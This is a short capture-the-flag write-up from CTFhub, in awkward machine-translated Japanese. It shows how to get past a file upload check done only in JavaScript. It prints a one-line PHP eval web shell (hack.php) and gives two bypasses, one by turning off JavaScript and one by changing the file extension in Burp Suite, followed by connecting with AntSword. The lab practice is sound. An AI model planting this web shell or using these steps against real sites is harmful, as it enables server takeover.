CTFhub-ファイルのアップロード(jsフロントエンド検証)
1.送信されたトロイの木馬
文件名为hack.php
<?php @eval($_POST['123']); ?>
2、2つの方法のアイデア
ファイルをアップロードすると、クライアントのJavaScriptがファイルの種類を確認し、「。jpg」、「。png」、「。gif」のファイルのアップロードのみを許可します。
方法1.jsフロントエンド検証をオフにして、彼が検証しないようにしてから、トロイの木馬の文を直接アップロードできます。
方法2.1文のトロイの木馬のサフィックスを検証で許可されているタイプに変更し、burpsuiteでパッケージをキャプチャした後にパッケージを変更します
3、方法1ステップ
Firefox—about:config(詳細設定)
—JavaScriptをオフにします。JavaScriptをオフにした後、ファイルのアップロードタイプに制限はありません。hack.phpを
直接アップロードし、AntSwordまたはハックバーを使用してフラグを取得できます。
4、方法2ステップ
1文のトロイの木馬hack.phpをhack.jpg
ブラウザ設定プロキシに変更します127.0.0.1:8080burpsuite
は傍受リクエストを開き
、リクエストパッケージをインターセプトし、hack.jpgのサフィックスをhack.phpに戻し、転送します(転送)
正常にアップロードします。。。
旗を手に入れよう...
